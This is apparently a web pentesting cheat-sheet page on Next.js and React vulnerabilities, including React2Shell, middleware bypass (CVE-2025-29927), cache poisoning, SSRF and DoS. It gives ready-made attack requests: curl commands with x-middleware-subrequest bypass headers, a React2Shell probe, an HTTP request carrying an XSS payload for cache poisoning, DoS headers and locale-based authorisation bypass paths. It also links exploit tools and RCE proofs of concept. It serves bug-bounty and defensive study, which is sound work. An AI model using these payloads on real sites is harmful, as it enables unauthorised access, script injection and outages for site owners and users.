Next.js / React

Next.js / React exploit

Find All Paths

Dev Tools - Console:

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

React2Shell / NextRCE

React2Shell Deep Dive: CVE-2025-55182 Exploit Mechanics | Wiz Blogwiz.io

CVE-2025-55182:

GitHub - assetnote/react2shell-scanner: High Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478)GitHub

GitHub - Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478: A command-line scanner for batch detection of Next.js application versions and determining if they are affected by CVE-2025-66478 vulnerability.GitHub

GitHub - ynsmroztas/NextRce: React Shell & Next.js RSC Exploit Tool (CVE-2025-55182)GitHub

Safe probe for Flight parser error with Curl and without harmful execution.

curl -X POST "https://target.com" -H "Next-Action: 13373" -F '1="{}"' -F '0=["$1:a:a"]'

Indicators of vulnerability:

• Response Code = 500

• Word "digest" appears in response body

Nuclei Template:

React Server Components - Remote Code ExecutionAI-Powered Template Generation and Scanning

GitHub - BehiSecc/react2shell-nuclei-template: Nuclei template for detecting the React2Shell vulnerability.GitHub

GitHub - msanft/CVE-2025-55182: Explanation and full RCE PoC for CVE-2025-55182GitHub

RCE PoC:

Prototype Pollution

ppmap:

GitHub - kleiton0x00/ppmap: A scanner/exploitation tool written in GO, which leverages client-side Prototype Pollution to XSS by exploiting known gadgets.GitHub

GitHub - PwnFunction/Next.js-Flat-Prototype-Pollution: Prototype Pollution using `flat` with Next.jsGitHub

SSRF

Digging for SSRF in NextJS appswww.assetnote.io

Header Injection

GET / HTTP/1.1
Host: target.com
Location: http://test.com
X-Middleware-Rewrite: http://test.com

CVE-2025-49826 - CPDos

Version < 15.1.8

Detected with HExHTTP

GitHub - c0dejump/HExHTTP: Header Exploitation HTTPGitHub

CVE-2025-29927: Next.js Middleware Bypass

All versions before 14.2.25 and 15.2.3

• Next.js 15.x should upgrade to 15.2.3

• Next.js 14.x should upgrade to 14.2.25

• Next.js 13.x should upgrade to 13.5.9

• Next.js 12.x should upgrade to 12.3.5

CVE-2025-29927: Next.js Middleware Bypass Vulnerability Explainedwww.picussecurity.com

Next.js and the corrupt middleware: the authorizing artifactzhero_web_security

GitHub - AnonKryptiQuz/NextSploit: NextSploit is a command-line tool designed to detect and exploit CVE-2025-29927, a security flaw in Next.jsGitHub

GitHub - c0dejump/CVE-2025-29927-check: script to check cve "CVE-2025-29927" while waiting to add it to HExHTTPGitHub

add the extra HTTP header x-middleware-subrequest: middleware

curl -H "x-middleware-subrequest: middleware" http://10.10.210.121:3000/protected

curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" https://target.com/dashboard

You can also try the header x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware if the previous payload doesn't work

GET /dashboard/admin HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

How Hackers Exploit CVE-2025–29927 in Next.js Like a ProMedium

Cache Poisoning

Next.js and cache poisoning: a quest for the black holezhero_web_security

DoS - Empty page

Add the x-middleware-prefetch header results in an empty JSON object {} as a response. If a CDN or caching system is present, this empty response can potentially be cached —depending on the cache rules configuration— rendering the targeted page impractical and its content inaccessible.

Display RSC Payload

Rsc: 1— was added to the cache-key via the Vary response header

DoS

Include x-invoke-status: 888 as a header

Cache poisoning via race-condition

Eclipse on Next.js: Conditioned exploitation of an intended race-conditionzhero_web_security

Cache Poisoning to XSS - CVE-2024-46982

To be potentially affected all of the following must apply:

• Next.js between 13.5.1 and 14.2.9

• Using pages router

• Using non-dynamic server-side rendered routes e.g. pages/dashboard.tsx not pages/blog/[slug].tsx

GET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: CP TO SXSS ON NEXT.JS : <img src=x onerror=alert('xss')>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
x-now-route-matches: 1

Next.js, cache, and chains: the stale elixirzhero_web_security

CVE-2024-34351

SSRF - Fixed in v14.1.1.

SSRF

CVE-2024-51479

/admin?__nextLocale=111
/admin/users?__nextLocale=anything

https://github.com/wy876/POC/blob/main/Next/Next.js%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87(CVE-2024-51479).mdgithub.com

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.